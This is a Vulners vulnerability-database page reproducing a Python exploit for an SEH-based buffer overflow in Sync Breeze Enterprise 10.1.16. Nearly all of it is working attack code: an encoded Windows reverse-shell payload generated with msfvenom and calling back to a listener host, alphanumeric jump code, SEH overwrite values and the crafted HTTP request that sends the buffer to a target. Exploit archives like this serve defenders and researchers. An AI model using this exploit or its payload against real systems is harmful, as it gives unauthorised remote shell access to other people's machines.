Vulners
Lucene search
Sync Breeze Enterprise 10.1.16 SEH Overflow
`#!/usr/bin/env python
#
# Exploit Title : Sync Breeze Enterprise v10.1.16 0day
# Date : 10/11/2017
# Vendor HomePage : http://www.syncbreeze.com
# Exploit Author : Milton Valencia (wetw0rk)
# Software : http://www.syncbreeze.com/downloads.html
# Version : 10.1.16
# Tested on : Windows 7 (x86)
#
# Description : Sync Breeze Enterprise 10.1.16 suffers from a SEH based
# vulnerability. Successful exploitation results in remote
# access.
#
# Special Greetz : Corelan, Offsec, Abatchy (top llama), Seamus, N4ss4r
# Ryan, Miguel (best boss..), everyone at https://netsecfocus.slack.com/
#
import sys, socket, struct
try:
host = sys.argv[1]
port = int(sys.argv[2])
except IndexError:
print "Usage: %s <target> <port>" % sys.argv[0]
print "Example: %s 192.168.0.16 80" % sys.argv[0]
sys.exit(0)
print "[->] Attacking %s:%d get that handler up" % (host,port)
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.16 LPORT=443
# -e x86/alpha_upper -b "\x00\x0a\x0d" -f c
shellcode = (
"\x89\xe3\xda\xdf\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x42\x33\x30"
"\x35\x50\x53\x30\x33\x50\x4b\x39\x4a\x45\x46\x51\x39\x50\x35"
"\x34\x4c\x4b\x30\x50\x46\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"
"\x36\x32\x42\x34\x4c\x4b\x53\x42\x46\x48\x54\x4f\x4e\x57\x30"
"\x4a\x56\x46\x56\x51\x4b\x4f\x4e\x4c\x37\x4c\x55\x31\x43\x4c"
"\x34\x42\x36\x4c\x47\x50\x59\x51\x58\x4f\x44\x4d\x43\x31\x38"
"\x47\x4d\x32\x5a\x52\x50\x52\x46\x37\x4c\x4b\x30\x52\x42\x30"
"\x4c\x4b\x31\x5a\x37\x4c\x4c\x4b\x50\x4c\x54\x51\x54\x38\x4b"
"\x53\x30\x48\x55\x51\x38\x51\x50\x51\x4c\x4b\x51\x49\x37\x50"
"\x35\x51\x59\x43\x4c\x4b\x50\x49\x54\x58\x4b\x53\x57\x4a\x30"
"\x49\x4c\x4b\x46\x54\x4c\x4b\x53\x31\x59\x46\x50\x31\x4b\x4f"
"\x4e\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x38\x47\x57\x48\x4b"
"\x50\x53\x45\x5a\x56\x43\x33\x53\x4d\x4c\x38\x47\x4b\x43\x4d"
"\x46\x44\x53\x45\x4a\x44\x36\x38\x4c\x4b\x31\x48\x46\x44\x35"
"\x51\x4e\x33\x52\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x58"
"\x45\x4c\x33\x31\x48\x53\x4c\x4b\x44\x44\x4c\x4b\x43\x31\x58"
"\x50\x4c\x49\x50\x44\x36\x44\x36\x44\x51\x4b\x51\x4b\x35\x31"
"\x31\x49\x31\x4a\x36\x31\x4b\x4f\x4d\x30\x31\x4f\x51\x4f\x31"
"\x4a\x4c\x4b\x55\x42\x5a\x4b\x4c\x4d\x31\x4d\x32\x48\x46\x53"
"\x50\x32\x53\x30\x35\x50\x33\x58\x34\x37\x34\x33\x30\x32\x31"
"\x4f\x56\x34\x53\x58\x50\x4c\x33\x47\x46\x46\x45\x57\x4b\x4f"
"\x39\x45\x38\x38\x5a\x30\x35\x51\x45\x50\x35\x50\x36\x49\x49"
"\x54\x46\x34\x46\x30\x35\x38\x37\x59\x4d\x50\x42\x4b\x33\x30"
"\x4b\x4f\x59\x45\x56\x30\x56\x30\x30\x50\x36\x30\x47\x30\x36"
"\x30\x57\x30\x46\x30\x42\x48\x5a\x4a\x44\x4f\x39\x4f\x4d\x30"
"\x4b\x4f\x4e\x35\x5a\x37\x43\x5a\x44\x45\x32\x48\x39\x50\x4f"
"\x58\x45\x50\x42\x30\x32\x48\x43\x32\x43\x30\x45\x51\x4f\x4b"
"\x4d\x59\x4a\x46\x43\x5a\x32\x30\x31\x46\x51\x47\x43\x58\x4d"
"\x49\x4e\x45\x54\x34\x33\x51\x4b\x4f\x48\x55\x4d\x55\x49\x50"
"\x54\x34\x34\x4c\x4b\x4f\x50\x4e\x55\x58\x43\x45\x4a\x4c\x33"
"\x58\x4c\x30\x38\x35\x4e\x42\x31\x46\x4b\x4f\x49\x45\x43\x58"
"\x55\x33\x52\x4d\x33\x54\x35\x50\x4d\x59\x5a\x43\x46\x37\x30"
"\x57\x51\x47\x50\x31\x5a\x56\x32\x4a\x52\x32\x51\x49\x36\x36"
"\x4d\x32\x4b\x4d\x52\x46\x4f\x37\x51\x54\x31\x34\x37\x4c\x33"
"\x31\x55\x51\x4c\x4d\x50\x44\x31\x34\x42\x30\x58\x46\x33\x30"
"\x47\x34\x31\x44\x46\x30\x31\x46\x56\x36\x46\x36\x51\x56\x46"
"\x36\x50\x4e\x50\x56\x56\x36\x31\x43\x30\x56\x53\x58\x32\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x4e\x35\x4c\x49\x4b\x50\x30"
"\x4e\x46\x36\x50\x46\x4b\x4f\x36\x50\x42\x48\x53\x38\x4b\x37"
"\x35\x4d\x45\x30\x4b\x4f\x59\x45\x4f\x4b\x4c\x30\x38\x35\x4f"
"\x52\x56\x36\x33\x58\x4f\x56\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x48\x55\x57\x4c\x34\x46\x33\x4c\x34\x4a\x4d\x50\x4b\x4b\x4d"
"\x30\x44\x35\x33\x35\x4f\x4b\x51\x57\x34\x53\x42\x52\x42\x4f"
"\x53\x5a\x35\x50\x46\x33\x4b\x4f\x48\x55\x41\x41"
)
# objdump2shellcode -d shellcode -f python -c -v jumpcode
jumpcode = ""
jumpcode += "\x25\x4a\x4d\x4e\x55" # and eax,0x554e4d4a
jumpcode += "\x25\x35\x32\x31\x2a" # and eax,0x2a313235
jumpcode += "\x2d\x37\x37\x37\x37" # sub eax,0x37373737
jumpcode += "\x2d\x74\x74\x74\x74" # sub eax,0x74747474
jumpcode += "\x2d\x55\x54\x55\x70" # sub eax,0x70555455
jumpcode += "\x50" # push eax
jumpcode += "\x25\x4a\x4d\x4e\x55" # and eax,0x554e4d4a
jumpcode += "\x25\x35\x32\x31\x2a" # and eax,0x2a313235
jumpcode += "\x2d\x2d\x76\x7a\x63" # sub eax,0x637a762d
jumpcode += "\x2d\x2d\x76\x7a\x30" # sub eax,0x307a762d
jumpcode += "\x2d\x25\x50\x7a\x30" # sub eax,0x307a5025
jumpcode += "\x50" # push eax
jumpcode += "\xff\xe4" # jmp esp
offset = "A" * (2495-len(shellcode)) # offset to nSEH
nSEH = "\x74\x06\x75\x06" # JE/JNZ -> jumpcode
SEH = struct.pack('<L', 0x1001C65C) # POP,POP,RET (libspp.dll)
trigger = "D" * (9067 - len(
jumpcode +
offset +
nSEH +
SEH
)
)
buffer = shellcode + offset + nSEH + SEH + jumpcode + trigger
vulnREQ = "GET /%s HTTP/1.1\r\n\r\n" % (buffer)
print "[->] sending poisonous bamboo"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
sock.send(vulnREQ)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Oct 2017 00:00Current